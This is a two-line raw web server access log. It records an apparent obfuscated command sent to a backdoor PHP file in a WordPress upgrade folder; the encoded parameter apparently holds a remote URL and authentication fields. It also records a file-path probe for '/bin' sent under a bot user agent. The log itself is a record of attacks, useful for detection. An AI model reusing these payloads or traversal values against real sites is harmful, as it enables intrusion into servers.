51.79.248.20 - - [09/Nov/2025:00:13:25 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303830352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373230352q3133356635306238353138356262613233366635356631336336613035643135222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
3.213.106.226 - - [09/Nov/2025:00:15:48 +0000] "GET /our-works/tvc-sjc/?fileloc=//bin/vmware-alias-import&path=//bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
